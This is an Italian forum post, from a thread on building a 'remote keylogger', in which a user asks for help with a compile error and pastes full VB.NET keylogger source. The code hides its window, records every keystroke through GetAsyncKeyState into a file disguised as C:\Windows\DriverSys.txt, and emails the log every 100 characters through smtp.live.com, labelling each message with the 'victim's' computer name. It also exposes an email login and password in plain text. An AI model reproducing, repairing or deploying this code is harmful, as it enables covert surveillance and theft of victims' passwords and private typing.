nicknamerandom
Nuovo utente
- 18 Febbraio 2011
- 11
- 0
- Miglior risposta
- 0
Riferimento: Come creare un Keylogger REMOTO
@rapa97
Infatti io usavo il VB 2010, però avevo già il Visual Basic Portable 6 sul PC.
Ho evidenziato del relativo colore le stringhe rosse. Se provo a salvare in "make project .exe" mi appare il messaggio
Compile error:
Invalid outside procedure e mi evidenzia nel codice: Imports System.IO che sta all'inizio
@rapa97
Infatti io usavo il VB 2010, però avevo già il Visual Basic Portable 6 sul PC.
Imports System.IO
Imports System.Net.mail
Public Class TaskHost
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Integer) As Integer
Public rip As Integer
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Me.Visible = False
Timer1.Start()
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
Me.Visible = False
For i As Integer = 3 To 255
Dim fi As FileInfo = New FileInfo("C:\Windows\DriverSys.txt")
Dim sw As StreamWriter
Dim ch As String
If GetAsyncKeyState(i) Then
ch = DirectCast(i, System.Windows.Forms.Keys).ToString
If ch.Length > 1 Then
ch = "{" + ch + "}"
End If
If fi.Exists = False Then
sw = fi.CreateText()
Else
sw = fi.AppendText()
End If
sw.Write (ch)
sw.Flush()
sw.Close()
TextBox1.Text = TextBox1.Text + ch
If TextBox1.TextLength = 100 Then
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("skillerfive@live.com", "lamiapasswordqua")
smtpServer.Port = 587
smtpServer.Host = "smtp.live.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("skillerfive@live.com")
mail.To.Add ("skillerfive@live.com")
mail.Subject = "KeyloggerRemoto" & "" & "Vittima:" & My.Computer.Name & "," & "Email N:" & Label4.Text
mail.Body = TextBox1.Text
smtpServer.Send (mail)
rip = 1
Label4.Text = rip
TextBox1.Text = ""
End If
End If
Next
Label1.Text = TextBox1.TextLength
End Sub
End Class
Ho evidenziato del relativo colore le stringhe rosse. Se provo a salvare in "make project .exe" mi appare il messaggio
Compile error:
Invalid outside procedure e mi evidenzia nel codice: Imports System.IO che sta all'inizio